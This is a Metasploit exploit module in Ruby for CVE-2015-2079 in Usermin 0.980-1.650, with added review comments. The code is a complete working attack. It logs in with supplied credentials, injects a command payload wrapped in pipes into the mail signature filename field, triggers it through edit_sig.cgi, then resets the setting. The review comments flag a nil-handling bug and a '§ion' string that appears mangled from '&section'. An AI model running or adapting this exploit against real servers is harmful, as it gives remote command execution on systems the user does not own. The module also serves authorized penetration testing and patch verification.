##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core' # Metasploit core API; provided by metasploit-framework (see header URL), not a standalone gem
# Metasploit exploit module for CVE-2015-2079: authenticated command execution
# in Usermin 0.980-1.650 through the mail signature filename setting (see the
# 'Description' below). Every request to the target carries HTTP basic auth
# built from the USERNAME / PASSWORD options, so a valid account is required;
# versions outside 0.980..1.650 are reported as not vulnerable by `check`.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  # Usermin's embedded web server identifies itself as "MiniServ"; the
  # framework uses this pattern to match the module against fingerprinted hosts.
  HttpFingerprint = { :pattern => [ /MiniServ/ ] }
  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata and the USERNAME / PASSWORD / TARGETURI options.
  # RPORT defaults to 20000 via 'DefaultOptions'.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info={})
    super(update_info(info,
      'Name' => "Usermin 0.980-1.650 Authenticated Arbitrary Command Execution",
      'Description' => %q{
        This modules exploits a vulnerability found in Usermin, version 0.980 up to
        1.650. As an authenticated user, arbitrary command execution is possible by
        manipulating the filename of an email signature file and triggering a function
        to display the signature.
        Payload hint: cmd/unix/*perl* works best because Usermin is based on Perl :-)
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'David Elze < david.elze@code-white.com >' # Discovery & this simple MSF module
        ],
      'References' =>
        [
          [ 'CVE', '2015-2079' ],
          [ 'URL', 'http://codewhitesec.blogspot.de/2015/05/cve-2015-2079-rce-usermin.html'],
        ],
      'Arch' => ARCH_CMD,
      'Platform' => ['unix'],
      'BadChars' => "",
      'Compat' =>
        {
          'PayloadType' => 'cmd',
          'RequiredCmd' => 'generic perl bash'
        },
      'Targets' =>
        [
          ['Usermin 0.980-1.650 on Linux', {}],
        ],
      'DisclosureDate' => "Feb 23 2015",
      'DefaultTarget' => 0,
      'DefaultOptions' =>
        {
          'RPORT' => 20000
        }))
    register_options(
      [
        OptString.new('USERNAME', [ true, 'Usermin username', '']),
        OptString.new('PASSWORD', [ true, 'Usermin password', '']),
        OptString.new('TARGETURI', [true, 'The URI path to Usermin', '/'])
      ], self.class)
  end

  # Version check: GETs TARGETURI and extracts "Usermin x.y" from the body.
  #
  # @return [Exploit::CheckCode] Appears when the parsed version falls inside
  #   0.980..1.650, Safe otherwise.
  #
  # NOTE(review): `res.body` is dereferenced before the `if res` guard on the
  # following line, so a nil response (connection failure) raises NoMethodError
  # instead of returning a CheckCode; the nil test should come first. `ver` is
  # nil when the banner is absent — confirm how Gem::Version.new treats nil on
  # the framework's Ruby before relying on that path.
  def check
    uri = normalize_uri(target_uri.path)
    uri << '/' if uri[-1, 1] != '/' # make sure the path ends with '/'
    res = send_request_raw({
      'method' => 'GET',
      'uri' => "#{uri}" # interpolation is redundant here; `uri` is already a String
    })
    ver = res.body.scan(/Usermin ([\.0-9]+)/).flatten.first
    if res and is_version_vulnerable?(ver)
      return Exploit::CheckCode::Appears
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Inclusive range test 0.980 <= ver <= 1.650 using Gem::Version ordering
  # (so "1.0" compares correctly against "0.980").
  #
  # @param ver [String] version string as scraped by `check`
  # @return [Boolean]
  # @raise [ArgumentError] if Gem::Version cannot parse `ver`
  def is_version_vulnerable?(ver)
    Gem::Version.new(ver) >= Gem::Version.new('0.980') && Gem::Version.new(ver) <= Gem::Version.new('1.650')
  end

  # Three authenticated requests: store the payload in the signature filename
  # setting (uconfig_save.cgi), trigger it (mailbox/edit_sig.cgi), then reset
  # the signature setting to its default. Each step aborts via fail_with on an
  # unexpected status code.
  #
  # NOTE(review): Failure::UnexpectedReply describes the three fail_with
  # conditions below more precisely than Failure::Unknown.
  def exploit
    http_handler = ((datastore['SSL']) ? "https" : "http")
    uri = target_uri.path
    # Absolute URL; used only to build the Referer header on each request.
    url = "#{http_handler}://#{rhost}:#{rport}#{uri}"
    print_status("Storing the malicious signature filename via uconfig_save.cgi ...")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'uconfig_save.cgi'),
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'headers' => {
        # NOTE(review): "§ion" here (and in the cleanup request) looks like
        # "&section" mangled by HTML-entity rendering of the gist (&sect;) —
        # verify against the upstream module before use.
        'Referer' => "#{url}uconfig.cgi?module=mailbox§ion=line1"
      },
      'vars_post' => {
        'module' => "mailbox",
        'sig_file' => "free",
        'sig_file_free' => "|" + payload.encoded + "|", # the signature filename field named in 'Description'
        'sig_mode' => "0",
        'save' => "Save"
      }
    })
    # Usermin answers a successful save with a redirect.
    unless res && res.code == 302
      fail_with(Failure::Unknown, "Something strange happened, abort!")
    end
    print_status("Calling the command via mailbox/edit_sig.cgi ...")
    res = send_request_raw({
      'method' => 'GET',
      'uri' => normalize_uri(uri, 'mailbox/edit_sig.cgi'),
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'headers' => {
        'Referer' => "#{url}left.cgi?mail=1"
      }
    })
    unless res && res.code == 200
      fail_with(Failure::Unknown, "Something strange happened, abort!")
    end
    # Hand off to the payload handler before the cleanup request below.
    handler
    print_status("Cleaning up by unsetting the Signature file...")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'uconfig_save.cgi'),
      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
      'headers' => {
        'Referer' => "#{url}uconfig.cgi?module=mailbox§ion=line1"
      },
      'vars_post' => {
        'module' => "mailbox",
        'sig_file' => "*", # restore the default signature selection
        'sig_file_free' => "",
        'sig_mode' => "0",
        'save' => "Save"
      }
    })
    if res && res.code == 302
      print_status("...done.")
    else
      fail_with(Failure::Unknown, "Something strange happened, abort!")
    end
  end
end